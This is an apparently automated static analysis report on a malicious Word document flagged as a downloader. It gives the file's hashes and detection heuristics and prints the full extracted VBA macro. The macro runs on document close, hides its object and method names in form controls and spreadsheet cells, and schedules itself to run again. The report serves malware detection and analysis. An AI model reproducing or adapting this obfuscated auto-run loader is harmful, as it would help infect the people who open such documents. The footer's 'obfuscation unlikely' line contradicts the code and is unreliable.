Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 7e7cf0a88bcc7b43…

Verdict: MALICIOUS
File type: Office (OOXML)

Size: 83.5 KB
Created: 2021-01-29 09:38:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2021-02-09
MD5: 1572e612fe1540da054fdb866db9f475
SHA-1: f62ce25df6e6e213eb1c1a11a2e01c4db5de486c
SHA-256: 7e7cf0a88bcc7b438aaca8a4cfdba4b7b0653d325bb6a2ec9c29ca3e276bef8c
Risk score: 222

Heuristics (5)

  • ClamAV: Doc.Downloader.Valyria-10033915-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Valyria-10033915-0
  • VBA project inside OOXML [medium, 2 related findings] OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    Matched line in script:
    Set fc = CreateObject(UserForm1.f2 & UserForm1.c6)
  • CallByName call [high] OLE_VBA_CALLBYNAME
    Matched line in script:
    Set it = CallByName(fc.Workbooks, UserForm1.oc2 & UserForm1.rw, 1, UserForm2.ComboBox1, , , , UserForm1.g5)
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; each extracted URL is labelled with the channel (macro, JS, link annotation, document body, ...) that reached it. Every URL extracted from this sample is an Office/OOXML XML namespace URI (schemas.microsoft.com, schemas.openxmlformats.org) found in document text (OOXML body / shared strings), i.e. a markup declaration rather than a navigable link.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 7014 bytes
SHA-256: 13c538d5305a8812976b690fc17ad7946f06c042d0093fd53202a8e34f57c4cd
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True


Public uq, a6, na, l4, ct, fc, g, rmt, cx, e1, af, o6, yb, cv, a3, de

Sub Document_Close()

rs

End Sub

Sub rs()

On Error Resume Next

UserForm2.ComboBox1.ListIndex = 5

Set fc = CreateObject(UserForm1.f2 & UserForm1.c6)

fc.DisplayAlerts = False

c0v = 1301

aa = 0

Err.Number = 0

at = UserForm2.ComboBox5

While c0v <> 0 And aa < 32

Set it = CallByName(fc.Workbooks, UserForm1.oc2 & UserForm1.rw, 1, UserForm2.ComboBox1, , , , UserForm1.g5)

c0v = Err.Number

aa = aa + 16

Wend

If c0v <> 0 Then

ErrHandler:

y24 = CallByName(Application, UserForm1.xu & UserForm1.bg, 2)

p = UserForm2.ComboBox3

If y24 <> False Then

Set mr = CreateObject(UserForm1.pn & UserForm1.ia)

CallByName mr.Documents, UserForm1.oc2 & UserForm1.rw, 1, ActiveDocument.FullName, , True

CallByName mr, UserForm1.b2 & UserForm1.po, 1, Now + TimeSerial(0, 0, 2), UserForm1.fe & UserForm1.qa & "rs"

ez = UserForm2.ComboBox18

Else

CallByName Application, UserForm1.b2 & UserForm1.po, 1, Now + TimeSerial(0, 0, 17), UserForm1.fe & UserForm1.qa & "rs"

End If

fc.Quit

Exit Sub

c19 = UserForm2.ComboBox3

End If

Dim rl

Set rl = fc.sheets(1)

hrt = UserForm2.ComboBox28

akh = "'"

de = fc.sheets(5).Cells(1, 1)

If Len(de) < 1 Then

If fc.ActiveWorkbook.Title <> "Google" Then

fj = UserForm2.ComboBox14

GoTo ErrHandler

Else

Exit Sub

End If

k5 = UserForm2.ComboBox25

End If

b8 = rl.Cells(78, 24).Value

q0 = rl.Cells(52, 11).Value

e1 = fc.sheets(1).Cells(8, 33).Value

af = fc.sheets(2).Cells(43, 29).Value

ct = fc.sheets(2).Cells(113, 7).Value

h5 = fc.sheets(2).Cells(109, 9).Value

p2 = fc.sheets(1).Cells(49, 20).Value

rx = fc.sheets(3).Cells(11, 13).Value

orv = UserForm2.ComboBox28

gk = fc.sheets(2).Cells(50, 18).Value

dd = rl.Cells(55, 29).Value

yb = fc.sheets(2).Cells(4, 10).Value

g = rl.Cells(74, 42).Value

pj = UserForm2.ComboBox27

cx = fc.sheets(3).Cells(36, 1).Value

ig = fc.sheets(3).Cells(96, 19).Value

y1 = fc.sheets(2).Cells(131, 40).Value

o6 = fc.sheets(1).Cells(26, 46).Value

cl9 = fc.sheets(1).Cells(54, 27).Value

p4 = UserForm2.ComboBox23

xrv = fc.sheets(2).Cells(82, 30).Value

xxe = UserForm2.ComboBox23

uq = fc.sheets(3).Cells(97, 25).Value

cy2 = fc.sheets(3).Cells(42, 52).Value

pb = UserForm2.ComboBox24

j2a = fc.sheets(1).Cells(146, 55).Value

rmt = fc.sheets(3).Cells(121, 12).Value

ud = UserForm2.ComboBox4

a6 = fc.sheets(3).Cells(134, 8).Value

r8b = fc.sheets(3).Cells(99, 42).Value

k3z = UserForm2.ComboBox7

p7 = fc.sheets(2).Cells(37, 1).Value

a3 = ""

Set Sh1 = fc.sheets(4)

v5 = 1

o = True

While o

fu = Sh1.Cells(v5, 1).Value

If Len(fu) < 1 Then

o = False

Else

a3 = a3 & fu

End If

v5 = v5 + 1

Wend

m8 = CallByName(fc, dd, 2)

UserForm1.zx.Value = p2 & m8 & xrv

ej = UserForm2.ComboBox3

UserForm1.qc6.Value = q0

pw = UserForm2.ComboBox12

CallByName CreateObject(p7), j2a, 1, UserForm1.zx, cl9, UserForm1.qc6

Set df = CreateObject(b8)

Set m1 = CallByName(df, h5, 2)

Set km = CallByName(m1, r8b, 1)

Set cx = CallByName(df, cx, 2)

Set l4 = df

ox = UserForm2.ComboBox12

o7 = UserForm2.ComboBox20

UserForm5.ComboBox1 = "t3"

Set uq = CallByName(cv, uq, 2)

rmt = CallByName(uq, rmt, 2)

UserForm1.q5.Value = cy2 & rx

UserForm3.ComboBox1 = gk

UserForm1.q5.Value = ig

UserForm4.ComboBox1 = UserForm3.ComboBox1

tn = UserForm2.ComboBox12

UserForm3.ComboBox1 = rmt

ba = UserForm2.ComboBox20

df = ly

it = p6

rl = ji

m1 = i2

km = d5u

cx = qs

e1 = hx

af = o0

cv = d4

uq = j

l4 = er

DoEvents

CallByName fc, y1, 1

fc = rm

d5 = UserForm2.ComboBox3

c8 = UserForm2.ComboBox19

End Sub

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{3F723E2C-D89E-417B-BAA2-FDD544C7D37A}{AB4874AA-B67B-40CA-B5FA-8F22FDF7D16B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{14CDA336-01FA-480E-9DC6-C05BA4AF714C}{5A75439F-77DE-45C8-9C78-CF88F35ECC6C}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 
 

 rf = UserForm2.Controls.Count - 1
 
 
 
 

 nk = ""
 For k9 = 1 To rf Step 2
 nk = nk & UserForm2.Controls.Item(k9)
 Next

 ComboBox1.AddItem "f8"
 ComboBox1.AddItem "zg"
 ComboBox1.AddItem "ei"
 ComboBox1.AddItem "ed"
 ComboBox1.AddItem "i3"
 ComboBox1.AddItem nk
 ComboBox1.AddItem "gz"
 
 
 
 
 

ay = UserForm2.ComboBox10

 
 
End Sub


Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{FC888E54-3D6A-4918-BC2A-155CF467F21C}{0637E2C7-9846-4BAD-AFF6-F3943A0B03EE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()

e8 = UserForm2.ComboBox13

 CallByName ActiveDocument.uq, ActiveDocument.g, VbMethod, 1, ActiveDocument.rmt
 CallByName ActiveDocument.uq, ActiveDocument.a6, VbMethod, UserForm1.q5.Value
End Sub

 

Attribute VB_Name = "UserForm4"
Attribute VB_Base = "0{6220F40F-D453-4037-BCB6-563FA4AFF1FB}{1421FE02-EA3F-488C-AC8F-1C7D917348BA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 CallByName ActiveDocument.l4, ActiveDocument.ct, VbMethod, UserForm1.q5.Value, ActiveDocument.a3, ActiveDocument.de

lj6 = UserForm2.ComboBox28

End Sub

 

Attribute VB_Name = "UserForm5"
Attribute VB_Base = "0{3358E2A1-0C34-47B2-94CC-C6A01B8D4514}{557DF1C4-AF53-4A94-B05B-C7D66144CACE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 Set ActiveDocument.e1 = CallByName(ActiveDocument.cx, ActiveDocument.e1, VbGet)
 Set ActiveDocument.af = CallByName(ActiveDocument.e1, ActiveDocument.af, VbGet)
 Set ActiveDocument.cv = CallByName(ActiveDocument.af, ActiveDocument.o6, VbMethod, ActiveDocument.yb)
End Sub
vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 51200 bytes
SHA-256: 77532f3a7587721eaaa330fab8017879e72c8abaac9afb7b43eb5805bf45c389
Detection
ClamAV: Doc.Downloader.Valyria-10033915-0
Obfuscation or payload: unlikely